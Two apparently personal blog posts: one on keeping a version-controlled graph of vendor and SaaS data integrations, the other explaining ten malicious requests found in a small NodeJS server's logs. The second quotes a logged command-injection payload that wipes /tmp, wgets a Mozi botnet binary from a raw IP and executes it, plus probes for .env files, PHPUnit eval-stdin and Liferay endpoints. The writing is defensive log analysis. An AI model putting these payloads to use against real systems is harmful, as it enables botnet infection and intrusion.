Map Your Data Integrations, Or You Don’t Understand Your Risk

It’s 3am. Do you know, exactly, where your data is?

Which vendors receive or touch your data?

What type of data each vendor is involved with?

Startups and software move fast, and pretty soon the SaaS and vendor integrations pile up. The connections carrying your company’s data are concrete, while their security and privacy implications are just as real but invisible.

Thesis: you need to maintain a living map of your SaaS and vendor integrations; otherwise you don’t actually understand your data tenancy or security.

Ask yourself: at your company, do you know who owns the list of all vendors and data flows? If the answer is “I think someone knows…”, “We could pull that together…”, or “It exists somewhere…”, you’re already behind.

If you’re in a regulated industry, or your customer contracts carry high expectations, operating without this data integration map is risky. The map matters across several areas:

  • Security
    • Data movements
    • Blast radius
  • Privacy and Data Governance
    • Where is PII/PHI flowing?
    • Subprocessors (approval and reviews)
    • Data retention + deletion obligations
  • Compliance & Customer Trust
    • SOC2, HITRUST, HIPAA, PCI, etc.
    • Enterprise security questionnaire: “List all your subprocessors”

Without the data integrations map, you’re running a structural risk, not just an operational inconvenience.

Data Integrations Graph (DIG)

Yes, ‘graph’ in the discrete mathematics sense: a structure of nodes and edges that you can visualize. An xlsx, Google Sheet, or table simply isn’t going to cut it.

  • Nodes: your systems, vendors, SaaS tools, data partners
  • Edges: direct connections and data flows between Nodes

A clarification on data flows vs. data integrations, and why the difference matters: the DIG extends the idea of a formal Data Flow Diagram (DFD) beyond your own systems and services to include every external system your data might touch. This is where most companies lose visibility.

Codify

As mentioned above, a spreadsheet can’t convey the graph. Instead use a lightweight syntax like Mermaid, Graphviz, or D2. (There are many online renderers for Graphviz. In a high-security environment, you’ll want to download and run Graphviz within your network to reduce the chance of publicly leaking the graph.) See basic and complex examples in Graphviz syntax. (Generated pics below.)

The graph may become visually complex. That’s fine: the code/syntax definition itself is meant to be referenced (e.g. control-F for all mentions of a node), not used only to generate visualizations. (But visualizations _are_ fun.)
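As a minimal sketch of what “codifying” the graph could look like, the snippet below keeps nodes and edges as plain Python data and emits Graphviz DOT text. The system names, vendor names, and data labels are all hypothetical placeholders, and `to_dot` is an illustrative helper, not part of any library.

```python
# Hypothetical systems and vendors; replace with your own inventory.
NODES = {
    "app": "Web App (ours)",
    "warehouse": "Data Warehouse (ours)",
    "crm": "CRM vendor",
    "email": "Email vendor",
}

# Each edge is (source, target, kind of data flowing). Values are illustrative.
EDGES = [
    ("app", "warehouse", "PII"),
    ("app", "crm", "PII"),
    ("crm", "email", "contact info"),
]


def to_dot(nodes, edges):
    """Render the nodes and edges as Graphviz DOT text."""
    lines = ["digraph dig {"]
    for node_id, label in nodes.items():
        lines.append(f'  {node_id} [label="{label}"];')
    for src, dst, data in edges:
        lines.append(f'  {src} -> {dst} [label="{data}"];')
    lines.append("}")
    return "\n".join(lines)


if __name__ == "__main__":
    print(to_dot(NODES, EDGES))
```

Saving the output to a file such as dig.dot and running `dot -Tsvg dig.dot -o dig.svg` with a local Graphviz install should render it. The text definition is what goes under source control, and it stays searchable even when the picture gets crowded.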

Living Document

This is not a “generate once and we’re done” exercise. Put the graph under source control, assign an owner, and involve processes and teams to ensure it stays up to date.

  • Reviews: annual or quarterly for network or inventory
  • Incident Response: understand blast radius quickly
  • Shadow IT discovery: cross-check against other inventories or reality
  • Vendor / SaaS acquisitions, reviews, and offboarding
  • Threat Modeling
  • Data Flows: use the graph to inform the flow diagram
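For the incident response item, one way to estimate blast radius is a breadth-first walk over the graph from the compromised node. This is only a sketch: the edge list is hypothetical, `blast_radius` is an illustrative helper, and it assumes data only moves in the direction of each edge.

```python
from collections import deque

# Hypothetical edges (source -> target); names are illustrative only.
EDGES = [
    ("app", "warehouse"),
    ("app", "crm"),
    ("crm", "email"),
    ("warehouse", "bi_tool"),
]


def blast_radius(edges, start):
    """Return every node reachable downstream of `start`, excluding `start`."""
    downstream = {}
    for src, dst in edges:
        downstream.setdefault(src, []).append(dst)

    seen = {start}
    queue = deque([start])
    while queue:
        node = queue.popleft()
        for nxt in downstream.get(node, []):
            if nxt not in seen:
                seen.add(nxt)
                queue.append(nxt)
    seen.discard(start)
    return seen


if __name__ == "__main__":
    print(sorted(blast_radius(EDGES, "app")))
```

If a compromise can also travel upstream (for example through shared credentials), the same walk could be run over reversed edges as well.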

Call to Action

Start small (pick 5-10 systems), map the integrations, put the map in source control, and integrate it into regular company processes.

You don’t need a perfect graph. You need a living one.

The companies that win on trust aren’t the ones with the most policies — they’re the ones that actually understand their systems.

10 Malicious Requests Against My Web Application

During a recent coding experiment/competition I had a (very rough) NodeJS app which I needed to deploy and host. Horror of horrors, I manually installed it onto a bare EC2 instance and pointed an Elastic IP at it. Using pm2 (a process manager) I was up and running very quickly, and writing request logs locally.

PORT=8080 pm2 start bin/www --time --output ~/log.txt

What’s nice about running on IaaS (vs. PaaS) is that there’s a lot more control and insight, specifically the log.txt named above. I could see the legitimate requests hitting my app from my fellow coders, but there were a lot of other requests causing my application to return 404 Not Found. I was curious, started duckduckgo’ing, and discovered that a lot of them were attempted web exploits hoping my server was vulnerable.
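A rough sketch of how such a log could be sifted for 404s, assuming each line follows the “timestamp: METHOD target status …” shape of the entries quoted further down in this post. The regular expression and the `not_found_targets` helper are my own illustration, not something pm2 provides.

```python
import re
from collections import Counter

# Matches lines like:
# 2021-04-25T14:57:06: GET /.env 404 0.919 ms - 1103
LINE_RE = re.compile(
    r"^(?P<time>\S+): (?P<method>[A-Z]+) (?P<target>\S+) (?P<status>\d{3}) "
)


def not_found_targets(lines):
    """Count (method, target) pairs that were answered with a 404."""
    counts = Counter()
    for line in lines:
        match = LINE_RE.match(line)
        if match and match.group("status") == "404":
            counts[(match.group("method"), match.group("target"))] += 1
    return counts


# Sample lines copied from this post; the last one has no status and is skipped.
SAMPLE = [
    "2021-04-25T10:19:17: GET /mysql/index.php?lang=en 404 0.940 ms - 1103",
    "2021-04-25T11:49:04: POST /HNAP1/ 404 0.837 ms - 1103",
    "2021-04-25T14:57:06: GET /.env 404 0.919 ms - 1103",
    "2021-04-25T17:00:00: POST http://likeapro.best/",
]

if __name__ == "__main__":
    for (method, target), count in not_found_targets(SAMPLE).most_common():
        print(count, method, target)
```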

Below are ten malicious requests narrated with some of my cursory research.

I don’t claim deep expertise in any of these attacks or technologies. (Please note my non-authoritative tone where I’ve written “I believe”.) Cybersecurity is a very deep field, and if I were architecting a truly critical system, there are many tools and appliances which can recognize and block such malicious requests, rather than leaving an EC2 instance naively exposed as I did. While it was entertaining to do the research below, I could have spent days looking deeper and learning about the history of each vulnerability or exploit.

Bonus: I have this list hosted in a public github repository, and I would welcome any pull requests to help correct, inform, or expand on anything below.

1) PHP and MySQL

2021-04-25T10:19:17: GET /mysql/index.php?lang=en 404 0.940 ms - 1103

PHP is a very common language in the web development community, and there are many sites describing how it can integrate with MySQL. ‘Index’ here with the php extension implies some code being run, not simply a static resource (such as an HTML file) being fetched. Since this is under the mysql resource, it appears to be a sniff to see if an admin console to the MySQL db (I believe something like phpMyAdmin) has been left open.

2) Mirai malware, bashdoor and arbitrary code execution

2021-04-25T10:21:27: GET /shell?cd+/tmp;rm+-rf+*;wget+http://172.36.40.208:44947/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws 404 0.964 ms - 1103

The shell resource is immediately recognizable: this is an attempt to inject and run arbitrary commands at the command-line level, in the spirit of a bashdoor attack. It first tries to clear out everything in the ‘tmp’ directory (cd /tmp; rm -rf *), then fetches (wget) a remotely hosted file (‘Mozi.a’, which I believe belongs to the Mozi botnet, a relative of Mirai), makes it executable (chmod 777), and tries to invoke it.
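To make the injected commands easier to read, the query string can be decoded (each + stands for a space) and split on the semicolons. A small sketch using only the standard library; `injected_commands` is an illustrative helper name.

```python
from urllib.parse import unquote_plus


def injected_commands(target):
    """Split the query part of a request target into shell-style commands."""
    _path, _sep, query = target.partition("?")
    return [cmd for cmd in unquote_plus(query).split(";") if cmd]


# Request target copied from the log line above.
TARGET = (
    "/shell?cd+/tmp;rm+-rf+*;wget+http://172.36.40.208:44947/Mozi.a;"
    "chmod+777+Mozi.a;/tmp/Mozi.a+jaws"
)

if __name__ == "__main__":
    for command in injected_commands(TARGET):
        print(command)
```

This only decodes the text for reading; it never executes anything.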

3) AWS Metadata (not malicious)

2021-04-25T11:17:53: GET http://169.254.169.254/latest/meta-data/ 404 1.033 ms - 1103

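Not an attack, rather something particular to AWS EC2 instance metadata. I believe it’s the AWS SDK (within my NodeJS application) locally looking for the metadata containing the AWS credentials (since my web app was integrated with DynamoDB). That said, since it showed up in my inbound request log, I can’t rule out a scanner checking whether my server would relay requests to that address. Noteworthy: 169.254.169.254 is the link-local address where every EC2 instance can reach its own metadata service.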

4) “The Moon” against Linksys Devices

2021-04-25T11:49:04: POST /HNAP1/ 404 0.837 ms - 1103

Home Network Administration Protocol (HNAP) is a Cisco proprietary protocol for managing network devices, going back to 2007. There was a worm, “The Moon”, back in 2014, which used HNAP1 requests to identify specific Linksys routers (firmware etc.), and then sent a second request to invoke an exploit at the CGI/script level which downloads the worm’s script.

5) Sniffing for Environment Variables

2021-04-25T14:57:06: GET /.env 404 0.919 ms - 1103

The .env file is not specific to one framework or language; it’s closer to an industry convention. I think this request is hoping that the server is simply hosting a directory and that a .env file might be exposed, possibly revealing things like API keys or credential tokens.

6) “Hey, look at my ads!!!”

2021-04-25T17:00:00: POST http://likeapro.best/

I tried the URL, and it was a ‘Not Found’, so maybe it was shut down or abandoned. Maybe someone is hoping to get more traffic to a site laden with ads. More nuisance than malice.

7) WiFi Cameras Leaking admin Passwords

2021-04-25T18:04:09: GET /config/getuser?index=0 404 0.940 ms - 1103

Specific D-Link Wi-Fi cameras had a vulnerability where the remote administrator password could be directly queried without authentication! Hoorah for the National Vulnerability Database (NIST): the page for this vulnerability was fun to read through, following the links deeper into the vulnerability and into who uncovered it and how.

8) PHP Unit Test Framework Weakening Prod

2021-04-25T20:12:45: POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 404 1.083 ms - 1103

This is a vulnerability in specific versions of PHPUnit, where arbitrary PHP code could be executed! (A good example of why modules specific to testing should be disabled or omitted in production deployments.) Here’s a very detailed story (by a PHP expert) on how this impacted a retail website. The first link is to cve.mitre.org, a vulnerability catalog sponsored by the USA’s DHS and CISA; the site itself is maintained by the MITRE Corp.

9) JSON Deserialization Vulnerability

2021-04-25T20:12:45: POST /api/jsonws/invoke 404 0.656 ms - 1103

Liferay is a digital portal/platform product which had a JSON deserialization and remote code execution vulnerability (CVE-2020-7961), documented by Code White in March of 2020. Bonus: here’s a scanner (on GitHub) someone created for this vulnerability.

10) Apache Solr Exposing Files

2021-04-25T20:12:45: GET /solr/admin/info/system?wt=json 404 0.989 ms - 1103

Ranked as the #7 Web Service Exploit of 2020, even though Apache published an issue back in 2013! The above request is a scan looking for specific versions of Apache Solr (a search platform), where a particular parameter is exposed and can lead to arbitrary file reading. Apparently this is combined with some other vulnerabilities to eventually get to remote code execution, as detailed in CVE-2013-6397.
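Pulling the list together, here is a naive sketch of how the paths above could be turned into a lookup table for labeling future log entries. The labels are my own shorthand for the sections in this post, `label_request` is an illustrative helper, and exact path matching is an assumption that would miss variations a real scanner might send.

```python
# Paths taken from the requests in this post; labels are informal shorthand.
SIGNATURES = {
    "/mysql/index.php": "PHP and MySQL console probe",
    "/shell": "command injection (Mozi download)",
    "/HNAP1/": '"The Moon" against Linksys devices',
    "/.env": "environment variable file probe",
    "/config/getuser": "Wi-Fi camera admin password leak",
    "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php": "PHPUnit code execution",
    "/api/jsonws/invoke": "Liferay JSON deserialization",
    "/solr/admin/info/system": "Apache Solr version scan",
}


def label_request(target):
    """Label a request target by its path, ignoring any query string."""
    path = target.partition("?")[0]
    return SIGNATURES.get(path, "unknown")


if __name__ == "__main__":
    print(label_request("/solr/admin/info/system?wt=json"))
    print(label_request("/index.html"))
```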